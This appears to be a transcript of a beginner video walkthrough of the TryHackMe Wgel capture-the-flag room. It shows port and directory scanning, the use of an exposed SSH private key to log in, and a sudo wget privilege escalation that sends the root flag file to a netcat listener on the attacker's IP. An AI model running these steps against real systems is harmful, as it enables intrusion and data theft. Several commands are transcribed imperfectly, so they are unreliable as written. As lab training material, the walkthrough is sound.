Well, hello everyone, I hope you're doing well. Now in today's video, I will be walking you guys through the WGEL CTF here on TryHackMe. Now this video will be a bit more dumbed down, so that way people who are new to cybersecurity and hacking in general will hopefully have a better understanding of how things work. And with that being said, I really would appreciate it if you were to like the video and hit subscribe, as it really helps out a ton. And this video is for educational purposes only, so do whatever you do in this video only on TryHackMe and places that you have permission to do so. With that being said, you guys will need to have an account here for TryHackMe. Once you are signed up, you should be able to go to tryhackme.com/room/wigglesctf, and we should be at the screen here. I'm going to go ahead and I'm going to start my machine, as it does take about a minute or two to get the machines going. Now, once we have that started, we are going to need to connect to our VPN. This VPN here will allow us to access our machines and communicate safely with their network. So to do that, you literally just click on Access Machines, and you should be able to just click on here, Open VPN, and you should be able to click on where you're at. So I'm doing it from Kali Linux, which I'll show you in a moment. So you can just click on Download your Open VPN configuration. Now, once you've downloaded that and you've transferred that over to your machine here, you should be able to open up your terminal. And we're going to need to know where it's at. So by default, my virtual machine opens up in the desktop folder. So that's where I know mine's going to be. Now we can see right here, alpharedbird.openvpn, that's my file. So we're going to need to install OpenVPN. So to do this, we can just type sudo apt install OpenVPN, enter in your Kali password, and you should be good to go. So we can just type sudo openvpn desktop/alpharedbird.ovpn, and we should get an IP address here, right in our top right. Now, once you have that number, you can just close the terminal. It should go away for a bit. And if it comes right back, we should be good to go. Now, there is one other thing we have to do regarding the VPN file. TryHackMe recently changed their packet rate limit from 1500 down to 1200. Why they did that, I'm not entirely sure, but we will need to change that or they will kick us off the VPN. So to do this, we can just type sudo ip link set dev ton 0 mtu 1200. And we should be good to go. And there we go. By the time it took us to do all of that, we now have our machine's IP. Now make sure to remember this number, and this will be the number here that I will be referring to as our target IP address. This is very important as not to get these confused, because you might accidentally attack somebody else's machine, and that's not very good. So we're going to just copy this for right now, and we're going to do something called enumeration. So we want to know what is running on this machine. So we can do a little port scan. That's what we're going to do with Nmap. We're going to say, hey, is port number 1 open? And if it is, they'll say, hey, yeah, I'm here. Or I'm running FTP, or I'm running SSH, or something along the sorts of that. And so that's what we are going to do. So we're just going to run sudo nmap-sv, oops, lowercase s, capital V, -t5, followed by our IP. Now I'm going to do just a little common scan. I think what we'll just do right now is we'll just add on -a, and we should go ahead and enter in our Kali password here. So we're just going to do a quick little service version scan. And we'll do T5 to be really quick, our IP, and then -a just for common scripts. Okay, looks like we got some information here from our scan. Looks like here it's running SSH, and it's also running HTTP on port 80. So we are going to now enumerate this HTTP port. So we should be able to just open up another terminal now. Oops, we're just going to run gobuster, then dir-u, and then we'll do http :// our IP :80. Then we'll do -w for our word list. Then we'll do /user share word lists. And what do we go with? dirbuster /directory. I usually like the directory medium. I think this should be solid. Then we'll do -t100. Just for 100 threads. Then we'll do -x for extensions. So we'll also look for TXT files. How about we look for JSON? And what about PHP? I think that should be all right. And we will let that scan. So it's going to see if we can try to find hidden files and folders on our IP. Now we're just going to let this run here in the background. And we'll just open up our browser for right now. So now while that's doing that, let's just go ahead and open up our browser here. And let's just browse to this web page here. And so we should be able to go to port 80 here. And okay, looks like we just get a simple Apache 2 web page. Now, nothing crazy, but we do know it is running a website. And so what I'm going to do is I'm just going to hit Control U. Let's see if we can inspect the code that's on this page. Because who knows? Maybe there's something hidden. Because I know TryHackMe does love to hide stuff here and there. To me, it doesn't look like anything's crazy, except for here it says, Jesse, don't forget to update the website in green here. So I'm going to keep track of the name Jesse here, because this could be a possible username or maybe a login or something like that. So we'll just keep that in mind for now. Everything else seems to be pretty standard. And so let's go ahead and just look at this sitemap. So GoBuster here found our website /sitemap. So this is some hidden page. So we can go to http:// our IP:80/sitemap. Now let's take a look here and oh, voila. Looks like we have our website here. Looks like our GoBuster is about 17% complete. So we're going to hit Control-C now. And we're just going to run the same scan. However, for our IP here, we're just going to add on /sitemap. That way we can try to scan what's on this page here. Because who knows, there could be something hidden. And let's just kind of poke around here. Let's see what it has. Let's try to go to admin.html. Who knows? Admin.html. Okay, yep, not here. Okay. However, looks like GoBuster is just finding basic website stuff. So let's try to navigate through it. So we can go to /sitemap/images. Okay, let's see. All right, looks like just images. Okay. We could always investigate these a little further, but I'm just going to go a quick little skim through them. Okay, nothing too crazy. To me, it looks just like a regular website. So it's been a while, and it looks like I haven't really found anything. So I'm going to change the word list that we used here. So let's see here. User share. Let's go here with word list / probably derp, and maybe... Let's see. I guess let's go with common for right now. So it should be the same command, just replacing the word list that we used with /derp /common.txt. Okay, and it looks like our scan's complete. And oh, actually, I found a .ssh directory. So let's see. Can we go to sitemap /.ssh? Ooh, we can. And look at that. This is actually quite a long shot, but we found our ID RSA key. So if you guys are not aware, there is a protocol called SSH, which we discovered here on port 22 earlier. Now, SSH allows us to remotely connect to our machine through the terminal. Now, because we have this key here, we can now just log in, and the RSA key here will just allow us to walk right in. We don't need to provide a password. Just as long as we have permissions to read this file, we should be good to go. So we're going to copy this here, and we'll go back to our GoBuster here, and we'll just clear the terminal for right now. Now, we should be able to type nano IDs_RSA. You should be able to just paste that in. There we go. You can hit Control X, hit Y, and hit Enter. Now, if we type ls, we can see we have ID RSA, yeah, right here. Cool. Now we are going to need to change the permissions so we can read this. So we can type chmod 600 and then ID RSA. We have the username Jesse, so we're just going to try to log in with Jesse, as that's from earlier. So we can type SSH, and let's do Jesse, JESSIE, at, and we're going to need that IP once again. Let's do -I, and we will supply here ID RSA. And it asks, do we want to accept the fingerprint? Now we're going to hit yes. And there we go. If I type who am I, we are now Jesse. Congratulations. And we should be able to grab this user.txt. Just type ls ***. And we can see, yeah, user flag is in documents. So cd documents. Okay. And cat user flag. The machine is quite laggy today. Not too sure why. Now we're going to need a way to become root. So now let's just try some basic user enumerations. So what we're going to do is we're going to see what can we do on this machine. Because sometimes people may configure this machine to allow everybody to have root access. Or maybe they have access to only certain commands and stuff like that. So we're going to see what we can do. So let's just type sudo -l. Okay. Let's see. We are allowed to run wget with no password. That's very nice. There's a really cool website called gtfobins.github.io. There we go. Pretty much this website has a collection of tons of different binaries and commands that we are allowed to exploit to get root access. So we're going to take what we get here. We get here wget. So let's look. Ooh, so we may be able to execute this. So it looks like here we are not able to drop a root user shell with wget. However, we can try to read some files here. So we're going to do things a little bit different because I'm not a fan of the way that they have this here. So what we're going to do is we're going to open up a netcat listener. So this opens up our virtual machine here. So we are able to get a connection back to it. So to do this, we can literally just type nc for netcat. Then we will do -lvmp. And I always do 4444 because I'm a creature of habit. And so what we're going to do now is we're going to type sudo /user /bin /wget, because you always have to be super specific, because you can always type wget, but root is going to look for it and be like, hey, I don't know where that's at. And what we can do now is we can type --post -file is equal to /root _flag.txt. And we'll do http:// and these are our numbers right up here in the corner. So this is going to be us. So this is 192.168.131.105. And we do :4444. We should be able to get a connection. And there we go. We grabbed our root flag. We can go ahead and paste this in. We have completed the room here. Very cool. We'll commit to 30 days because I'm going to lock in. Now, pretty much what we did here is, because we had permission to run user bin /wget as root, we just ran it as root. And what we did is we used that root permission to read this file here, root /root_flag.txt, and send it back to us. Now, how did I know there was going to be a root flag.txt here? I didn't really know. I just took a blatant guess, because if we looked from before here, we have here user_flag.txt. So I just took a guess, hey, it's probably root_flag.txt. Now, there are better ways to exploit this room. However, I'm going to keep this video a little bit more for beginner friendly. So this is the simplest way to do it. Now, with that being said, I hope you guys have learned at least one thing from this video. So make sure you guys like and subscribe, as it really, really helps a ton. And I will see you guys all later.